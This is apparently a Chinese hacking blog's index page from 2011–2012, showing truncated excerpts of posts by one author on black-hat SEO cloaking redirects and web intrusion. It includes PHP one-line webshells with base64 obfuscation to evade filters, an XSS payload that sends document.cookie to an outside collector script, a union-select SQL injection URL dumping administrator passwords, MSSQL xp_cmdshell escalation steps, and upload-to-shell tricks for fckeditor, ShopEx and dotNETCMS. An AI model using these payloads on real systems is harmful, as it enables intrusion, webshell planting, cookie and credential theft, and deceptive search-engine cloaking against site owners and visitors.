Jan052012
黑帽seo之js跳转代码
网上一直都有人在用 这个代码 判断网站访客来路 如果是聪搜索引擎来的 就跳转 如果是直接访问则不变化 这段代码是从网上找来的 已经很久了 感谢原作者
?View Code JAVASCRIPT1
2
3
4
5
6
7
8
9
10
11
<script language="javascript">
var pattern = /google/gi;
var pattern1= /yahoo/gi;
var keyValue=escape(document.referrer);
if (pattern.exec(keyV...阅读全文
作者:骚鱼 | 分类:Blackhat | 阅读:128 views |
抢沙发
Dec312011
根据user-agent判断蜘蛛代码 黑帽跳转代码
黑帽seo手段中有一个大家都在用的技巧,在服务端判断 客户端浏览器的user-agent然后做进一步操作,
如果是搜索引擎的user-agent则301跳转 目前网上好多欺骗友情链接的就是这个做法(代码会放在最后)
具体还有很多思路,跳转了,乔页等 今天仅把代码放出来 php的代码
声明 代码都是百度下来的 先写个简单的
根据php的 $_SERVER['HTTP_USER_AGENT']来进行判断
?View Code PHP1
2
3
4
5
6
...阅读全文
Dec292011
Dec292011
php一句话变异收集
转自 土司 原创作者请联系 会标明版权
在渗透中常常遇到拦截eval的,所以
<?php eval($_POST[xiao])?>这种形式的会被拦截
常见的是变成
base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)
这种形式可以绕过,另外还有其他形式
<?php $_GET['eval']($_POST['xiao']);?>
今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。
完了才知道是个webshell扫描工...阅读全文
作者:骚鱼 | 分类:PHP | 阅读:181 views |
Dec172011
Dec172011
1433 sa提权详细过程
转自土司 T00ls.net
1、 无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)
这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。
第一步
exec sp_dropextendedproc ‘xp_cmdshell&...阅读全文
Dec152011
ashx脚本 生成一句话
今天检测一个站安全 net aspx winiis 环境
发下有fckeditor 但没有上传点 自己构造了一个上传点 aa.asp;.jpg不能上传
忽然想起一篇文章 上传ashx脚本 访问后生成一句话
脚本内容为
?View Code HTML1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
using System...阅读全文
Dec152011
Fckeditor 2.4.2 php任意上传文件漏洞
1、漏洞描述
fckeditor/editor/filemanager/upload/php/upload.php
?View Code PHP1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
9...阅读全文
Dec102011
XSS偷cookie的代码
<script>document.write(‘<img src=”http://url/news.asp?msg=’+document.cookie+’” width=0 height=0 border=0 />’);</script>
news.asp代码:
<%
msg=Request.ServerVariables(“QUERY_STRING”)
testfile=Server.MapPath(“cook.txt”)
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.OpenTextFile(test...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:157 views |
Nov232011
千博企业网站管理系统漏洞
在NoSql.asp文件中7kccopyd-code
<%
If EnableStopInjection = True Then
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
Fy_In = “’|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare”
Fy_Inf = Split(Fy_In, “|”)
If Request.Form<>”" Then
For Each Fy_Post In Request.Form
For Fy_Xh = 0 To UBound(Fy_Inf)
If InStr(L...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:123 views |
Nov192011
针对$_SERVER[’PHP_SELF’]的跨站脚本攻击
![针对$_SERVER[’PHP_SELF’]的跨站脚本攻击](http://www.saoyu.com/wp-content/themes/weisaysimple/weisaysimple/images/random/tb7.jpg)
现在的web服务器和开发工具虽然不会再出现像asp的%81那样明显的漏洞了,但是由于开发人员的疏忽和各种语言特性组合造成的一些奇异的漏洞仍然会存在。今天偶然读到的XSS Woes,就详细讲述了和$_SERVER[’PHP_SELF’]相关的一个危险漏洞。
$_SERVER[’PHP_SELF’]在开发的时候常会用到,一般用来引用当前网页地址,并且它是系统自动生成的全局变量,也会有什么问题么?让我们先看看下面的代码吧:...阅读全文
作者:骚鱼 | 分类:PHP | 阅读:76 views |
Nov012011
shopex 4.85 后台拿SHELL
今天有人公布一shopex 4.85 后台拿SHELL信好不是我发现那个,嘿嘿,转过来发布!
刚在官方下了一个最新的自己测试了一下。很简单的。
进后台(废话)
http://localhost/shopadmin/index.php#ctl=system/template&act=editor&p[0]=purple&p[1]=index.php
自己编辑吧。。
http://localhost/themes/purple/index.php就是这个文件咯。
阅读全文
作者:骚鱼 | 分类:Hack | 阅读:163 views |
Oct312011
discuz 7.2 爆路径 漏洞
这里只是说下方法,在要爆DZ 7.2 bbs的网站后面加上以下代码访问,即可爆出。
“manyou/admincp.php?my_suffix=%0A%0DTOBY57″,引号不算。
例如:
http://team.dis9.com/manyou/admincp.php?my_suffix=%0A%0DTOBY57
效果图如下:
阅读全文
作者:骚鱼 | 分类:Hack | 阅读:230 views |
Oct202011
php后台插入一句话思路
首先介绍下php的各种标签:
1):
<?php ?>
demo:
<?php echo "test";?>
这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!
2):
<? echo "test"; ?>
这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它,
大多程序员都是很熟悉的!我们把这种标签称为短语标签!
3):
<script language="ph...阅读全文
Oct192011
fckeditor <= 2.6.4 任意文件上传漏洞
fckeditor <= 2.6.4 任意文件上传漏洞
简要描述:
fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测
详细说明:
currentfolder过滤不给力啊,但是GPC就能让它脑残
代码<?
error_reporting(0);
set_time_limit(0);
ini_set(“default_socket_timeout”, 5);
define(STDIN, fopen(“php://stdin”, “r”));
$match = array();
function h...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:218 views |
Oct192011
住哪网酒店分销联盟系统SQL注入漏洞
发布日期:2011-09.08
发布作者:歌颂
漏洞类型:SQL注入
漏洞描述:住哪网酒店分销联盟系统SQL注入漏洞,直接爆出管理员帐号密码。
Search:inurl:index.php?m=hotelinfo
注入EXP:
http://yunsec.net/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
默认后台:index.php?m=admin/logi...阅读全文
Oct192011
ecshop v2.7.2 漏洞
漏洞分析:
先看下漏洞是怎么产生的!直接看代码:
js/calendar.php
$lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞
if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’))
{
$lang = ‘zh_cn’;
}
require(dirname(dirname(__FILE__)) . ‘/data/config.php’);
header(‘Content-type: application/x-javascript; charset=...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:229 views |
Oct142011
PHP Exp漏洞的利用方法
很多人都看到过一些关于PHP的EXP程序,但都不会利用。其实这种漏洞利用程序利用起来很简单的。
首先我们来在本地装一下php的运行环境。打开php-installer,一切设置都默认(我安装的目录是D盘的php),一路next就可以了
我们用PHPCMS的一个漏洞来做演示。
我们可以发现这些EXP都是PHP的代码,这怎么弄呢?
大家别急,先把这段代码用记事本保存下来,我保存在D:/php/phpcms.php这里了。现在...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:184 views |
Oct142011
风讯dotNETCMS 0day
漏洞影响:风讯dotNETCMS 通杀 测试了 v1.0 sp4 sp5
漏洞作者:kooice
漏洞出在用户页面,注册个用户。文章管理,上传。。选择文件名不变….
上传1.asp;.jpg
然后你们懂的!
阅读全文
作者:骚鱼 | 分类:Hack | 阅读:124 views |
Oct142011
风讯 dotNETCMS 上传漏洞及修复
/user/login.aspx ,点注册。
点击发表文章。
在发表文章页面,点击“选择图片”
我们在这里,记下这个目录名, Userfiles/049357214223 , 这是你的附件保存的目录名。
然后在站内信息那块, 给自己发送个站内信,附件里直接传马。
然后,在收件箱找到这个站内信,打开,下载附件,在这里记录下我们的马儿上传上去后的名字就好了。
得到马儿的新名字: c58f7a4d960...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:145 views |
我的微博
最活跃的读者
最新评论
混世魔王:
复制来的文章,你还好意思标明!你好:
你好 请问单页类站的支付系统怎么混世魔王:
已做好贵站的链接了。人类:
IE不起作用啊?谷歌 火狐都正常活金蛋白:
文章很不错,支持博主。安睡宝:
很好的内容。让我深受感触。妙姿堂特效祛斑王:
支持原创,过来转转,欢迎互踩纽斯葆:
小纽过来问候博主了 文章真给力杭州婚纱摄影:
写得不错
小纽过来问候博主了 文章真给力
